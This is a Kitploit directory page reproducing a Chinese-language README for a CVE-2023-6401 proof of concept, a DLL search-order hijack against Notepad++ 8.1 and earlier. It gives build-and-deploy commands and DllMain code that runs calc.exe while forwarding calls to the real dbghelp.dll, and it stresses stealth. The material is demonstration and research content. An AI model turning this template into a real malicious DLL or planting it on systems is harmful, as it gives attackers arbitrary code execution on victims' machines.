Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-6401 — CVE-2023-6401 是一个 DLL 劫持漏洞,攻击者可通过在应用程序目录中放置恶意的 `dbghelp.dll` 文件来执行任意代码。该项目演示了该漏洞,并提供了可复现的 PoC。 | Kitploit
工具/GitHubGitHub/mekitoci/cve-2023-6401
漏洞分析漏洞利用学习与教育Payload 开发二进制利用
GitHubmekitoci/cve-2023-6401

CVE-2023-6401

CVE-2023-6401 是一个 DLL 劫持漏洞,攻击者可通过在应用程序目录中放置恶意的 `dbghelp.dll` 文件来执行任意代码。该项目演示了该漏洞,并提供了可复现的 PoC。

查看仓库
171年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-6401 · DLL劫持概念验证

License Platform

English | 中文


中文

⚠️ 重要声明:仅供安全研究和教育目的使用

NotePad++ ≤ 8.1 DLL劫持漏洞的概念验证。通过在应用程序目录放置恶意 dbghelp.dll 来执行任意代码。

快速开始

root@kitploit:~
# 下載專案
git clone https://github.com/mekitoci/CVE-2023-6401.git

# 進入專案目錄
cd CVE-2023-6401-main

# 編譯DLL
# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# 部署到NotePad++目錄
copy dbghelp.dll "C:\Program Files\Notepad++\"

# 執行測試
"C:\Program Files\Notepad++\notepad++.exe"

# 立即清理
del "C:\Program Files\Notepad++\dbghelp.dll"

预期结果: 计算器弹出 + 消息框显示 + NotePad++正常启动

PoC result

漏洞详情

原理

Windows按以下顺序加载DLL:

  1. 应用程序目录(最高优先级)
  2. System32目录
  3. Windows目录
  4. 当前目录
  5. PATH环境变量

NotePad++启动时会加载 dbghelp.dll,通过在应用程序目录放置同名恶意DLL,可在系统DLL加载前执行代码。

技术实现

核心代码

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Execute malicious code
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // Load real DLL and forward API calls
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

关键特点

  • 搜索顺序劫持:利用Windows DLL搜索机制
  • API转发:加载真实DLL并转发函数调用,保持应用程序正常运行
  • 隐蔽性:用户察觉不到异常

编译选项

MinGW (推荐)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

清理

root@kitploit:~
# 移除惡意DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# 確認移除
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "清理完成"

参考资料

  • CVE-2023-6401
  • Microsoft DLL搜索顺序
  • MITRE ATT&CK T1574.001

免责声明

本项目仅供教育和安全研究使用。使用者需对遵守适用法律法规承担全部责任。


English

⚠️ 重要声明:仅供安全研究和教育目的使用

NotePad++ ≤ 8.1 DLL劫持漏洞的概念验证。通过在应用程序目录放置恶意 dbghelp.dll 来执行任意代码。

快速开始

root@kitploit:~
# Clone the project
git clone https://github.com/mekitoci/CVE-2023-6401.git

# Navigate to project directory
cd CVE-2023-6401-main

# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# Deploy to NotePad++ directory
copy dbghelp.dll "C:\Program Files\Notepad++\"

# Execute test
"C:\Program Files\Notepad++\notepad++.exe"

# Immediate cleanup
del "C:\Program Files\Notepad++\dbghelp.dll"

预期结果: 计算器弹出 + 消息框显示 + NotePad++正常启动

PoC result

漏洞详情

原理

Windows按以下顺序加载DLL:

  1. 应用程序目录(最高优先级)
  2. System32目录
  3. Windows目录
  4. 当前目录
  5. PATH环境变量

NotePad++启动时会加载 dbghelp.dll,通过在应用程序目录放置同名恶意DLL,可在系统DLL加载前执行代码。

技术实现

核心代码

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Execute malicious code
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // Load real DLL and forward API calls
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

关键特点

  • 搜索顺序劫持:利用Windows DLL搜索机制
  • API转发:加载真实DLL并转发函数调用,保持应用程序正常运行
  • 隐蔽性:用户察觉不到异常

编译选项

MinGW (推荐)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

清理

root@kitploit:~
# Remove malicious DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# Confirm removal
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "Cleanup completed"

参考资料

  • CVE-2023-6401
  • Microsoft DLL搜索顺序
  • MITRE ATT&CK T1574.001

免责声明

本项目仅供教育和安全研究使用。使用者需对遵守适用法律法规承担全部责任。

下载工具
项目详情
CVE编号CVE-2023-6401
影响版本NotePad++ ≤ 8.1
漏洞类型DLL劫持 / 搜索路径劫持
影响执行任意代码
前提条件应用程序目录写入权限
项目详情
CVE编号CVE-2023-6401
影响版本NotePad++ ≤ 8.1
漏洞类型DLL劫持 / 搜索顺序劫持
影响任意代码执行
前提条件应用程序目录写入权限